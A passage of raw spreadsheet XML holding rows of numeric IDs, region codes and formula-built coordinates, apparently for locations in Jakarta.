        <v>23</v>
      </c>
      <c r="G684" t="s">
        <v>2827</v>
      </c>
      <c r="H684" t="s">
        <v>26</v>
      </c>
      <c r="J684" t="s">
        <v>2683</v>
      </c>
      <c r="L684" t="s">
        <v>2828</v>
      </c>
      <c r="M684">
        <v>3172070002</v>
      </c>
      <c r="N684">
        <v>3172070</v>
      </c>
      <c r="O684">
        <v>3172</v>
      </c>
      <c r="P684">
        <v>31</v>
      </c>
      <c r="Q684" t="s">
        <v>128</v>
      </c>
      <c r="R684" t="s">
        <v>128</v>
      </c>
      <c r="S684" t="s">
        <v>49</v>
      </c>
      <c r="T684" t="s">
        <v>33</v>
      </c>
      <c r="U684" s="5">
        <v>10691090</v>
      </c>
      <c r="V684" s="5" t="s">
        <v>15088</v>
      </c>
      <c r="W684" s="5">
        <v>-624559</v>
      </c>
      <c r="X684" t="s">
        <v>18894</v>
      </c>
      <c r="Y684" t="str">
        <f t="shared" si="10"/>
        <v>-6.24559,106.91090</v>
      </c>
    </row>
    <row r="685" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A685">
        <v>109559</v>
      </c>
      <c r="B685" s="1">
        <v>43877</v>
      </c>
      <c r="C685">
        <v>1</v>
      </c>
      <c r="D685" t="s">
        <v>2648</v>
      </c>
      <c r="E685" t="s">
        <v>23</v>
      </c>
      <c r="G685" t="s">
        <v>2829</v>
      </c>
      <c r="H685" t="s">
        <v>26</v>
      </c>
      <c r="J685" t="s">
        <v>2830</v>
      </c>
      <c r="L685" t="s">
        <v>2831</v>
      </c>
      <c r="M685">
        <v>3172060003</v>
      </c>
      <c r="N685">
        <v>3172060</v>
      </c>
      <c r="O685">
        <v>3172</v>
      </c>
      <c r="P685">
        <v>31</v>
      </c>
      <c r="Q685" t="s">
        <v>2832</v>
      </c>
      <c r="R685" t="s">
        <v>48</v>
      </c>
      <c r="S685" t="s">
        <v>49</v>
      </c>
      <c r="T685" t="s">
        <v>33</v>
      </c>
      <c r="U685" s="5">
        <v>10687841</v>
      </c>
      <c r="V685" s="5" t="s">
        <v>15089</v>
      </c>
      <c r="W685" s="5">
        <v>-622532</v>
      </c>
      <c r="X685" t="s">
        <v>18895</v>
      </c>
      <c r="Y685" t="str">
        <f t="shared" si="10"/>
        <v>-6.22532,106.87841</v>
      </c>
    </row>
    <row r="686" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A686">
        <v>109560</v>
      </c>
      <c r="B686" s="1">
        <v>43877</v>
      </c>
      <c r="C686">
        <v>1</v>
      </c>
      <c r="D686" t="s">
        <v>2648</v>
      </c>
      <c r="E686" t="s">
        <v>23</v>
      </c>
      <c r="G686" t="s">
        <v>2833</v>
      </c>
      <c r="H686" t="s">
        <v>26</v>
      </c>
      <c r="J686" t="s">
        <v>2834</v>
      </c>
      <c r="L686" t="s">
        <v>2835</v>
      </c>
      <c r="M686">
        <v>3175050003</v>
      </c>
      <c r="N686">
        <v>3175050</v>
      </c>
      <c r="O686">
        <v>3175</v>
      </c>
      <c r="P686">
        <v>31</v>
      </c>
      <c r="Q686" t="s">
        <v>1740</v>
      </c>
      <c r="R686" t="s">
        <v>1013</v>
      </c>
      <c r="S686" t="s">
        <v>547</v>
      </c>
      <c r="T686" t="s">
        <v>33</v>
      </c>
      <c r="U686" s="5">
        <v>10691950</v>
      </c>
      <c r="V686" s="5" t="s">
        <v>15090</v>
      </c>
      <c r="W686" s="5">
        <v>-616536</v>
      </c>
      <c r="X686" t="s">
        <v>18896</v>
      </c>
      <c r="Y686" t="str">
        <f t="shared" si="10"/>
        <v>-6.16536,106.91950</v>
      </c>
    </row>
    <row r="687" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A687">
        <v>109561</v>
      </c>
      <c r="B687" s="1">
        <v>43877</v>
      </c>
      <c r="C687">
        <v>1</v>
      </c>
      <c r="D687" t="s">
        <v>2648</v>
      </c>
      <c r="E687" t="s">
        <v>23</v>
      </c>
      <c r="G687" t="s">
        <v>2836</v>
      </c>
      <c r="H687" t="s">
        <v>26</v>
      </c>
      <c r="J687" t="s">
        <v>2837</v>
      </c>
      <c r="L687" t="s">
        <v>2838</v>
      </c>
      <c r="M687">
        <v>3172060004</v>
      </c>
      <c r="N687">
        <v>3172060</v>
      </c>
      <c r="O687">
        <v>3172</v>
      </c>
      <c r="P687">
        <v>31</v>
      </c>
      <c r="Q687" t="s">
        <v>47</v>
      </c>
      <c r="R687" t="s">
        <v>48</v>
      </c>
      <c r="S687" t="s">
        <v>49</v>
      </c>
      <c r="T687" t="s">
        <v>33</v>
      </c>
      <c r="U687" s="5">
        <v>10688835</v>
      </c>
      <c r="V687" s="5" t="s">
        <v>15091</v>
      </c>
      <c r="W687" s="5">
        <v>-622305</v>
      </c>
      <c r="X687" t="s">
        <v>18897</v>
      </c>
      <c r="Y687" t="str">
        <f t="shared" si="10"/>
        <v>-6.22305,106.88835</v>
      </c>
    </row>
    <row r="688" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A688">
        <v>109562</v>
      </c>
      <c r="B688" s="1">
        <v>43877</v>
      </c>
      <c r="C688">
        <v>1</v>
      </c>
      <c r="D688" t="s">
        <v>2648</v>
      </c>
      <c r="E688" t="s">
        <v>23</v>
      </c>
      <c r="G688" t="s">
        <v>2839</v>
      </c>
      <c r="H688" t="s">
        <v>26</v>
      </c>
      <c r="J688" t="s">
        <v>2740</v>
      </c>
      <c r="L688" t="s">
        <v>2840</v>
      </c>
      <c r="M688">
        <v>3173070003</v>
      </c>
      <c r="N688">
        <v>3173070</v>
      </c>
      <c r="O688">
        <v>3173</v>
      </c>
      <c r="P688">
        <v>31</v>
      </c>
      <c r="Q688" t="s">
        <v>520</v>
      </c>
      <c r="R688" t="s">
        <v>323</v>
      </c>
      <c r="S688" t="s">
        <v>62</v>
      </c>
      <c r="T688" t="s">
        <v>33</v>
      </c>
      <c r="U688" s="5">
        <v>10683360</v>
      </c>
      <c r="V688" s="5" t="s">
        <v>15092</v>
      </c>
      <c r="W688" s="5">
        <v>-615220</v>
      </c>
      <c r="X688" t="s">
        <v>18898</v>
      </c>
      <c r="Y688" t="str">
        <f t="shared" si="10"/>
        <v>-6.15220,106.83360</v>
      </c>
    </row>
    <row r="689" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A689">
        <v>109563</v>
      </c>
      <c r="B689" s="1">
        <v>43877</v>
      </c>
      <c r="C689">
        <v>1</v>
      </c>
      <c r="D689" t="s">
        <v>2648</v>
      </c>
      <c r="E689" t="s">
        <v>23</v>
      </c>
      <c r="G689" t="s">
        <v>2841</v>
      </c>
      <c r="H689" t="s">
        <v>26</v>
      </c>
      <c r="J689" t="s">
        <v>2842</v>
      </c>
      <c r="L689" t="s">
        <v>2843</v>
      </c>
      <c r="M689">
        <v>3171070005</v>
      </c>
      <c r="N689">
        <v>3171070</v>
      </c>
      <c r="O689">
        <v>3171</v>
      </c>
      <c r="P689">
        <v>31</v>
      </c>
      <c r="Q689" t="s">
        <v>218</v>
      </c>
      <c r="R689" t="s">
        <v>121</v>
      </c>
      <c r="S689" t="s">
        <v>108</v>
      </c>
      <c r="T689" t="s">
        <v>33</v>
      </c>
      <c r="U689" s="5">
        <v>10681822</v>
      </c>
      <c r="V689" s="5" t="s">
        <v>15093</v>
      </c>
      <c r="W689" s="5">
        <v>-623764</v>
      </c>
      <c r="X689" t="s">
        <v>18899</v>
      </c>
      <c r="Y689" t="str">
        <f t="shared" si="10"/>
        <v>-6.23764,106.81822</v>
      </c>
    </row>
    <row r="690" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A690">
        <v>109564</v>
      </c>
      <c r="B690" s="1">
        <v>43877</v>
      </c>
      <c r="C690">
        <v>1</v>
      </c>
      <c r="D690" t="s">
        <v>2648</v>
      </c>
      <c r="E690" t="s">
        <v>23</v>
      </c>
      <c r="G690" t="s">
        <v>2844</v>
      </c>
      <c r="H690" t="s">
        <v>26</v>
      </c>
      <c r="J690" t="s">
        <v>2845</v>
      </c>
      <c r="L690" t="s">
        <v>2846</v>
      </c>
      <c r="M690">
        <v>3172070003</v>
      </c>
      <c r="N690">
        <v>3172070</v>
      </c>
      <c r="O690">
        <v>3172</v>
      </c>
      <c r="P690">
        <v>31</v>
      </c>
      <c r="Q690" t="s">
        <v>2659</v>
      </c>
      <c r="R690" t="s">
        <v>128</v>
      </c>
      <c r="S690" t="s">
        <v>49</v>
      </c>
      <c r="T690" t="s">
        <v>33</v>
      </c>
      <c r="U690" s="5">
        <v>10693025</v>
      </c>
      <c r="V690" s="5" t="s">
        <v>15094</v>
      </c>
      <c r="W690" s="5">
        <v>-623280</v>
      </c>
      <c r="X690" t="s">
        <v>18900</v>
      </c>
      <c r="Y690" t="str">
        <f t="shared" si="10"/>
        <v>-6.23280,106.93025</v>
      </c>
    </row>
    <row r="691" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A691">
        <v>109565</v>
      </c>
      <c r="B691" s="1">
        <v>43877</v>
      </c>
      <c r="C691">
        <v>1</v>
      </c>
      <c r="D691" t="s">
        <v>2648</v>
      </c>
      <c r="E691" t="s">
        <v>23</v>
      </c>
      <c r="G691" t="s">
        <v>2847</v>
      </c>
      <c r="H691" t="s">
        <v>26</v>
      </c>
      <c r="J691" t="s">
        <v>2848</v>
      </c>
      <c r="L691" t="s">
        <v>2849</v>
      </c>
      <c r="M691">
        <v>3173020005</v>
      </c>
      <c r="N691">
        <v>3173020</v>
      </c>
      <c r="O691">
        <v>3173</v>
      </c>
      <c r="P691">
        <v>31</v>
      </c>
      <c r="Q691" t="s">
        <v>2041</v>
      </c>
      <c r="R691" t="s">
        <v>179</v>
      </c>
      <c r="S691" t="s">
        <v>62</v>
      </c>
      <c r="T691" t="s">
        <v>33</v>
      </c>
      <c r="U691" s="5">
        <v>10683286</v>
      </c>
      <c r="V691" s="5" t="s">
        <v>15095</v>
      </c>
      <c r="W691" s="5">
        <v>-618401</v>
      </c>
      <c r="X691" t="s">
        <v>18901</v>
      </c>
      <c r="Y691" t="str">
        <f t="shared" si="10"/>
        <v>-6.18401,106.83286</v>
      </c>
    </row>
    <row r="692" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A692">
        <v>109566</v>
      </c>
      <c r="B692" s="1">
        <v>43877</v>
      </c>
      <c r="C692">
        <v>1</v>
      </c>
      <c r="D692" t="s">
        <v>2648</v>
      </c>
      <c r="E692" t="s">
        <v>23</v>
      </c>
      <c r="G692" t="s">
        <v>2850</v>
      </c>
      <c r="H692" t="s">
        <v>26</v>
      </c>
      <c r="J692" t="s">
        <v>2851</v>
      </c>
      <c r="L692" t="s">
        <v>2852</v>
      </c>
      <c r="M692">
        <v>3172080006</v>
      </c>
      <c r="N692">
        <v>3172080</v>
      </c>
      <c r="O692">
        <v>3172</v>
      </c>
      <c r="P692">
        <v>31</v>
      </c>
      <c r="Q692" t="s">
        <v>2853</v>
      </c>
      <c r="R692" t="s">
        <v>141</v>
      </c>
      <c r="S692" t="s">
        <v>49</v>
      </c>
      <c r="T692" t="s">
        <v>33</v>
      </c>
      <c r="U692" s="5">
        <v>10693790</v>
      </c>
      <c r="V692" s="5" t="s">
        <v>15096</v>
      </c>
      <c r="W692" s="5">
        <v>-615480</v>
      </c>
      <c r="X692" t="s">
        <v>18902</v>
      </c>
      <c r="Y692" t="str">
        <f t="shared" si="10"/>
        <v>-6.15480,106.93790</v>
      </c>
    </row>
    <row r="693" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A693">
        <v>109567</v>
      </c>
      <c r="B693" s="1">
        <v>43877</v>
      </c>
      <c r="C693">
        <v>1</v>
      </c>
      <c r="D693" t="s">
        <v>2648</v>
      </c>
      <c r="E693" t="s">
        <v>23</v>
      </c>
      <c r="G693" t="s">
        <v>2854</v>
      </c>
      <c r="H693" t="s">
        <v>26</v>
      </c>
      <c r="J693" t="s">
        <v>2679</v>
      </c>
      <c r="L693" t="s">
        <v>2855</v>
      </c>
      <c r="M693">
        <v>3172090001</v>
      </c>
      <c r="N693">
        <v>3172090</v>
      </c>
      <c r="O693">
        <v>3172</v>
      </c>
      <c r="P693">
        <v>31</v>
      </c>
      <c r="Q693" t="s">
        <v>2681</v>
      </c>
      <c r="R693" t="s">
        <v>890</v>
      </c>
      <c r="S693" t="s">
        <v>49</v>
      </c>
      <c r="T693" t="s">
        <v>33</v>
      </c>
      <c r="U693" s="5">
        <v>10687637</v>
      </c>
      <c r="V693" s="5" t="s">
        <v>15038</v>
      </c>
      <c r="W693" s="5">
        <v>-620737</v>
      </c>
      <c r="X693" t="s">
        <v>18843</v>
      </c>
      <c r="Y693" t="str">
        <f t="shared" si="10"/>
        <v>-6.20737,106.87637</v>
      </c>
    </row>
    <row r="694" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A694">
        <v>109568</v>
      </c>
      <c r="B694" s="1">
        <v>43877</v>
      </c>
      <c r="C694">
        <v>1</v>
      </c>
      <c r="D694" t="s">
        <v>2648</v>
      </c>
      <c r="E694" t="s">
        <v>23</v>
      </c>
      <c r="G694" t="s">
        <v>2856</v>
      </c>
      <c r="H694" t="s">
        <v>26</v>
      </c>
      <c r="J694" t="s">
        <v>2857</v>
      </c>
      <c r="L694" t="s">
        <v>2858</v>
      </c>
      <c r="M694">
        <v>3175060001</v>
      </c>
      <c r="N694">
        <v>3175060</v>
      </c>
      <c r="O694">
        <v>3175</v>
      </c>
      <c r="P694">
        <v>31</v>
      </c>
      <c r="Q694" t="s">
        <v>2278</v>
      </c>
      <c r="R694" t="s">
        <v>2279</v>
      </c>
      <c r="S694" t="s">
        <v>547</v>
      </c>
      <c r="T694" t="s">
        <v>33</v>
      </c>
      <c r="U694" s="5">
        <v>10692334</v>
      </c>
      <c r="V694" s="5" t="s">
        <v>15097</v>
      </c>
      <c r="W694" s="5">
        <v>-614934</v>
      </c>
      <c r="X694" t="s">
        <v>18903</v>
      </c>
      <c r="Y694" t="str">
        <f t="shared" si="10"/>
        <v>-6.14934,106.92334</v>
      </c>
    </row>
    <row r="695" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A695">
        <v>109569</v>
      </c>
      <c r="B695" s="1">
        <v>43877</v>
      </c>
      <c r="C695">
        <v>1</v>
      </c>
      <c r="D695" t="s">
        <v>2648</v>
      </c>
      <c r="E695" t="s">
        <v>23</v>
      </c>
      <c r="G695" t="s">
        <v>2859</v>
      </c>
      <c r="H695" t="s">
        <v>26</v>
      </c>
      <c r="J695" t="s">
        <v>2860</v>
      </c>
      <c r="L695" t="s">
        <v>2861</v>
      </c>
      <c r="M695">
        <v>3174080001</v>
      </c>
      <c r="N695">
        <v>3174080</v>
      </c>
      <c r="O695">
        <v>3174</v>
      </c>
      <c r="P695">
        <v>31</v>
      </c>
      <c r="Q695" t="s">
        <v>694</v>
      </c>
      <c r="R695" t="s">
        <v>695</v>
      </c>
      <c r="S695" t="s">
        <v>32</v>
      </c>
      <c r="T695" t="s">
        <v>33</v>
      </c>
      <c r="U695" s="5">
        <v>10669933</v>
      </c>
      <c r="V695" s="5" t="s">
        <v>15098</v>
      </c>
      <c r="W695" s="5">
        <v>-617200</v>
      </c>
      <c r="X695" t="s">
        <v>18904</v>
      </c>
      <c r="Y695" t="str">
        <f t="shared" si="10"/>
        <v>-6.17200,106.69933</v>
      </c>
    </row>
    <row r="696" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A696">
        <v>109570</v>
      </c>
      <c r="B696" s="1">
        <v>43877</v>
      </c>
      <c r="C696">
        <v>1</v>
      </c>
      <c r="D696" t="s">
        <v>2648</v>
      </c>
      <c r="E696" t="s">
        <v>23</v>
      </c>
      <c r="G696" t="s">
        <v>2862</v>
      </c>
      <c r="H696" t="s">
        <v>26</v>
      </c>
      <c r="J696" t="s">
        <v>2863</v>
      </c>
      <c r="L696" t="s">
        <v>2864</v>
      </c>
      <c r="M696">
        <v>3172020003</v>
      </c>
      <c r="N696">
        <v>3172020</v>
      </c>
      <c r="O696">
        <v>3172</v>
      </c>
      <c r="P696">
        <v>31</v>
      </c>
      <c r="Q696" t="s">
        <v>1644</v>
      </c>
      <c r="R696" t="s">
        <v>1644</v>
      </c>
      <c r="S696" t="s">
        <v>49</v>
      </c>
      <c r="T696" t="s">
        <v>33</v>
      </c>
      <c r="U696" s="5">
        <v>10688112</v>
      </c>
      <c r="V696" s="5" t="s">
        <v>15099</v>
      </c>
      <c r="W696" s="5">
        <v>-631856</v>
      </c>
      <c r="X696" t="s">
        <v>18905</v>
      </c>
      <c r="Y696" t="str">
        <f t="shared" si="10"/>
        <v>-6.31856,106.88112</v>
      </c>
    </row>
    <row r="697" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A697">
        <v>109571</v>
      </c>
      <c r="B697" s="1">
        <v>43877</v>
      </c>
      <c r="C697">
        <v>1</v>
      </c>
      <c r="D697" t="s">
        <v>2648</v>
      </c>
      <c r="E697" t="s">
        <v>23</v>
      </c>
      <c r="G697" t="s">
        <v>2865</v>
      </c>
      <c r="H697" t="s">
        <v>26</v>
      </c>
      <c r="J697" t="s">
        <v>1572</v>
      </c>
      <c r="L697" t="s">
        <v>2866</v>
      </c>
      <c r="M697">
        <v>3175030001</v>
      </c>
      <c r="N697">
        <v>3175030</v>
      </c>
      <c r="O697">
        <v>3175</v>
      </c>
      <c r="P697">
        <v>31</v>
      </c>
      <c r="Q697" t="s">
        <v>1574</v>
      </c>
      <c r="R697" t="s">
        <v>1563</v>
      </c>
      <c r="S697" t="s">
        <v>547</v>
      </c>
      <c r="T697" t="s">
        <v>33</v>
      </c>
      <c r="U697" s="5">
        <v>10686028</v>
      </c>
      <c r="V697" s="5" t="s">
        <v>15100</v>
      </c>
      <c r="W697" s="5">
        <v>-613378</v>
      </c>
      <c r="X697" t="s">
        <v>18579</v>
      </c>
      <c r="Y697" t="str">
        <f t="shared" si="10"/>
        <v>-6.13378,106.86028</v>
      </c>
    </row>
    <row r="698" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A698">
        <v>109572</v>
      </c>
      <c r="B698" s="1">
        <v>43877</v>
      </c>
      <c r="C698">
        <v>1</v>
      </c>
      <c r="D698" t="s">
        <v>2648</v>
      </c>
      <c r="E698" t="s">
        <v>23</v>
      </c>
      <c r="G698" t="s">
        <v>2867</v>
      </c>
      <c r="H698" t="s">
        <v>26</v>
      </c>
      <c r="J698" t="s">
        <v>2868</v>
      </c>
      <c r="L698" t="s">
        <v>2869</v>
      </c>
      <c r="M698">
        <v>3172080001</v>
      </c>
      <c r="N698">
        <v>3172080</v>
      </c>
      <c r="O698">
        <v>3172</v>
      </c>
      <c r="P698">
        <v>31</v>
      </c>
      <c r="Q698" t="s">
        <v>48</v>
      </c>
      <c r="R698" t="s">
        <v>141</v>
      </c>
      <c r="S698" t="s">
        <v>49</v>
      </c>
      <c r="T698" t="s">
        <v>33</v>
      </c>
      <c r="U698" s="5">
        <v>10690446</v>
      </c>
      <c r="V698" s="5" t="s">
        <v>15101</v>
      </c>
      <c r="W698" s="5">
        <v>-621175</v>
      </c>
      <c r="X698" t="s">
        <v>18906</v>
      </c>
      <c r="Y698" t="str">
        <f t="shared" si="10"/>
        <v>-6.21175,106.90446</v>
      </c>
    </row>
    <row r="699" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A699">
        <v>109573</v>
      </c>
      <c r="B699" s="1">
        <v>43877</v>
      </c>
      <c r="C699">
        <v>1</v>
      </c>
      <c r="D699" t="s">
        <v>2648</v>
      </c>
      <c r="E699" t="s">
        <v>23</v>
      </c>
      <c r="G699" t="s">
        <v>2870</v>
      </c>
      <c r="H699" t="s">
        <v>26</v>
      </c>
      <c r="J699" t="s">
        <v>2871</v>
      </c>
      <c r="L699" t="s">
        <v>2872</v>
      </c>
      <c r="M699">
        <v>3172080003</v>
      </c>
      <c r="N699">
        <v>3172080</v>
      </c>
      <c r="O699">
        <v>3172</v>
      </c>
      <c r="P699">
        <v>31</v>
      </c>
      <c r="Q699" t="s">
        <v>2250</v>
      </c>
      <c r="R699" t="s">
        <v>141</v>
      </c>
      <c r="S699" t="s">
        <v>49</v>
      </c>
      <c r="T699" t="s">
        <v>33</v>
      </c>
      <c r="U699" s="5">
        <v>10695252</v>
      </c>
      <c r="V699" s="5" t="s">
        <v>15102</v>
      </c>
      <c r="W699" s="5">
        <v>-619942</v>
      </c>
      <c r="X699" t="s">
        <v>18907</v>
      </c>
      <c r="Y699" t="str">
        <f t="shared" si="10"/>
        <v>-6.19942,106.95252</v>
      </c>
    </row>
    <row r="700" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A700">
        <v>109574</v>
      </c>
      <c r="B700" s="1">
        <v>43877</v>
      </c>
      <c r="C700">
        <v>1</v>
      </c>
      <c r="D700" t="s">
        <v>2648</v>
      </c>
      <c r="E700" t="s">
        <v>23</v>
      </c>
      <c r="G700" t="s">
        <v>2873</v>
      </c>
      <c r="H700" t="s">
        <v>26</v>
      </c>
      <c r="J700" t="s">
        <v>2874</v>
      </c>
      <c r="L700" t="s">
        <v>2794</v>
      </c>
      <c r="M700">
        <v>3175010004</v>
      </c>
      <c r="N700">
        <v>3175010</v>
      </c>
      <c r="O700">
        <v>3175</v>
      </c>
      <c r="P700">
        <v>31</v>
      </c>
      <c r="Q700" t="s">
        <v>546</v>
      </c>
      <c r="R700" t="s">
        <v>546</v>
      </c>
      <c r="S700" t="s">
        <v>547</v>
      </c>
      <c r="T700" t="s">
        <v>33</v>
      </c>
      <c r="U700" s="5">
        <v>10679913</v>
      </c>
      <c r="V700" s="5" t="s">
        <v>15103</v>
      </c>
      <c r="W700" s="5">
        <v>-612795</v>
      </c>
      <c r="X700" t="s">
        <v>18908</v>
      </c>
      <c r="Y700" t="str">
        <f t="shared" si="10"/>
        <v>-6.12795,106.79913</v>
      </c>
    </row>
    <row r="701" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A701">
        <v>109575</v>
      </c>
      <c r="B701" s="1">
        <v>43877</v>
      </c>
      <c r="C701">
        <v>1</v>
      </c>
      <c r="D701" t="s">
        <v>2648</v>
      </c>
      <c r="E701" t="s">
        <v>23</v>
      </c>
      <c r="G701" t="s">
        <v>2875</v>
      </c>
      <c r="H701" t="s">
        <v>26</v>
      </c>
      <c r="J701" t="s">
        <v>2876</v>
      </c>
      <c r="L701" t="s">
        <v>2877</v>
      </c>
      <c r="M701">
        <v>3172100006</v>
      </c>
      <c r="N701">
        <v>3172100</v>
      </c>
      <c r="O701">
        <v>3172</v>
      </c>
      <c r="P701">
        <v>31</v>
      </c>
      <c r="Q701" t="s">
        <v>1435</v>
      </c>
      <c r="R701" t="s">
        <v>1436</v>
      </c>
      <c r="S701" t="s">
        <v>49</v>
      </c>
      <c r="T701" t="s">
        <v>33</v>
      </c>
      <c r="U701" s="5">
        <v>10687236</v>
      </c>
      <c r="V701" s="5" t="s">
        <v>15104</v>
      </c>
      <c r="W701" s="5">
        <v>-619275</v>
      </c>
      <c r="X701" t="s">
        <v>18909</v>
      </c>
      <c r="Y701" t="str">
        <f t="shared" si="10"/>
        <v>-6.19275,106.87236</v>
      </c>
    </row>
    <row r="702" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A702">
        <v>109576</v>
      </c>
      <c r="B702" s="1">
        <v>43877</v>
      </c>
      <c r="C702">
        <v>1</v>
      </c>
      <c r="D702" t="s">
        <v>2648</v>
      </c>
      <c r="E702" t="s">
        <v>23</v>
      </c>
      <c r="G702" t="s">
        <v>2878</v>
      </c>
      <c r="H702" t="s">
        <v>26</v>
      </c>
      <c r="J702" t="s">
        <v>2879</v>
      </c>
      <c r="L702" t="s">
        <v>2794</v>
      </c>
      <c r="M702">
        <v>3172070004</v>
      </c>
      <c r="N702">
        <v>3172070</v>
      </c>
      <c r="O702">
        <v>3172</v>
      </c>
      <c r="P702">
        <v>31</v>
      </c>
      <c r="Q702" t="s">
        <v>2880</v>
      </c>
      <c r="R702" t="s">
        <v>128</v>
      </c>
      <c r="S702" t="s">
        <v>49</v>
      </c>
      <c r="T702" t="s">
        <v>33</v>
      </c>
      <c r="U702" s="5">
        <v>10694335</v>
      </c>
      <c r="V702" s="5" t="s">
        <v>15105</v>
      </c>
      <c r="W702" s="5">
        <v>-622072</v>
      </c>
      <c r="X702" t="s">
        <v>18910</v>
      </c>
      <c r="Y702" t="str">
        <f t="shared" si="10"/>
        <v>-6.22072,106.94335</v>
      </c>
    </row>
    <row r="703" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A703">
        <v>109577</v>
      </c>
      <c r="B703" s="1">
        <v>43877</v>
      </c>
      <c r="C703">
        <v>1</v>
      </c>
      <c r="D703" t="s">
        <v>2648</v>
      </c>
      <c r="E703" t="s">
        <v>23</v>
      </c>
      <c r="G703" t="s">
        <v>2881</v>
      </c>
      <c r="H703" t="s">
        <v>26</v>
      </c>
      <c r="J703" t="s">
        <v>2882</v>
      </c>
      <c r="L703" t="s">
        <v>2883</v>
      </c>
      <c r="M703">
        <v>3175060001</v>
      </c>
      <c r="N703">
        <v>3175060</v>
      </c>
      <c r="O703">
        <v>3175</v>
      </c>
      <c r="P703">
        <v>31</v>
      </c>
      <c r="Q703" t="s">
        <v>2278</v>
      </c>
      <c r="R703" t="s">
        <v>2279</v>
      </c>
      <c r="S703" t="s">
        <v>547</v>
      </c>
      <c r="T703" t="s">
        <v>33</v>
      </c>
      <c r="U703" s="5">
        <v>10692181</v>
      </c>
      <c r="V703" s="5" t="s">
        <v>15106</v>
      </c>
      <c r="W703" s="5">
        <v>-615235</v>
      </c>
      <c r="X703" t="s">
        <v>18911</v>
      </c>
      <c r="Y703" t="str">
        <f t="shared" si="10"/>
        <v>-6.15235,106.92181</v>
      </c>
    </row>
    <row r="704" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A704">
        <v>109578</v>
      </c>
      <c r="B704" s="1">
        <v>43877</v>
      </c>
      <c r="C704">
        <v>1</v>
      </c>
      <c r="D704" t="s">
        <v>2648</v>
      </c>
      <c r="E704" t="s">
        <v>23</v>
      </c>
      <c r="G704" t="s">
        <v>2884</v>
      </c>
      <c r="H704" t="s">
        <v>26</v>
      </c>
      <c r="J704" t="s">
        <v>2434</v>
      </c>
      <c r="L704" t="s">
        <v>2885</v>
      </c>
      <c r="M704">
        <v>3172080001</v>
      </c>
      <c r="N704">
        <v>3172080</v>
      </c>
      <c r="O704">
        <v>3172</v>
      </c>
      <c r="P704">
        <v>31</v>
      </c>
      <c r="Q704" t="s">
        <v>48</v>
      </c>
      <c r="R704" t="s">
        <v>141</v>
      </c>
      <c r="S704" t="s">
        <v>49</v>
      </c>
      <c r="T704" t="s">
        <v>33</v>
      </c>
      <c r="U704" s="5">
        <v>10690810</v>
      </c>
      <c r="V704" s="5" t="s">
        <v>15107</v>
      </c>
      <c r="W704" s="5">
        <v>-619988</v>
      </c>
      <c r="X704" t="s">
        <v>18912</v>
      </c>
      <c r="Y704" t="str">
        <f t="shared" si="10"/>
        <v>-6.19988,106.90810</v>
      </c>
    </row>
    <row r="705" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A705">
        <v>109579</v>
      </c>
      <c r="B705" s="1">
        <v>43877</v>
      </c>
      <c r="C705">
        <v>1</v>
      </c>
      <c r="D705" t="s">
        <v>2648</v>
      </c>
      <c r="E705" t="s">
        <v>23</v>
      </c>
      <c r="G705" t="s">
        <v>2886</v>
      </c>
      <c r="H705" t="s">
        <v>26</v>
      </c>
      <c r="J705" t="s">
        <v>801</v>
      </c>
      <c r="L705" t="s">
        <v>2887</v>
      </c>
      <c r="M705">
        <v>3174010006</v>
      </c>
      <c r="N705">
        <v>3174010</v>
      </c>
      <c r="O705">
        <v>3174</v>
      </c>
      <c r="P705">
        <v>31</v>
      </c>
      <c r="Q705" t="s">
        <v>268</v>
      </c>
      <c r="R705" t="s">
        <v>69</v>
      </c>
      <c r="S705" t="s">
        <v>32</v>
      </c>
      <c r="T705" t="s">
        <v>33</v>
      </c>
      <c r="U705" s="5">
        <v>10675293</v>
      </c>
      <c r="V705" s="5" t="s">
        <v>15108</v>
      </c>
      <c r="W705" s="5">
        <v>-615884</v>
      </c>
      <c r="X705" t="s">
        <v>18913</v>
      </c>
      <c r="Y705" t="str">
        <f t="shared" si="10"/>
        <v>-6.15884,106.75293</v>
      </c>
    </row>
    <row r="706" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A706">
        <v>109580</v>
      </c>
      <c r="B706" s="1">
        <v>43877</v>
      </c>
      <c r="C706">
        <v>1</v>
      </c>
      <c r="D706" t="s">
        <v>2648</v>
      </c>
      <c r="E706" t="s">
        <v>23</v>
      </c>
      <c r="G706" t="s">
        <v>2888</v>
      </c>
      <c r="H706" t="s">
        <v>26</v>
      </c>
      <c r="J706" t="s">
        <v>2876</v>
      </c>
      <c r="L706" t="s">
        <v>2889</v>
      </c>
      <c r="M706">
        <v>3172100006</v>
      </c>
      <c r="N706">
        <v>3172100</v>
      </c>
      <c r="O706">
        <v>3172</v>
      </c>
      <c r="P706">
        <v>31</v>
      </c>
      <c r="Q706" t="s">
        <v>1435</v>
      </c>
      <c r="R706" t="s">
        <v>1436</v>
      </c>
      <c r="S706" t="s">
        <v>49</v>
      </c>
      <c r="T706" t="s">
        <v>33</v>
      </c>
      <c r="U706" s="5">
        <v>10687322</v>
      </c>
      <c r="V706" s="5" t="s">
        <v>15109</v>
      </c>
      <c r="W706" s="5">
        <v>-619316</v>
      </c>
      <c r="X706" t="s">
        <v>18914</v>
      </c>
      <c r="Y706" t="str">
        <f t="shared" si="10"/>
        <v>-6.19316,106.87322</v>
      </c>
    </row>
    <row r="707" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A707">
        <v>109581</v>
      </c>
      <c r="B707" s="1">
        <v>43877</v>
      </c>
      <c r="C707">
        <v>1</v>
      </c>
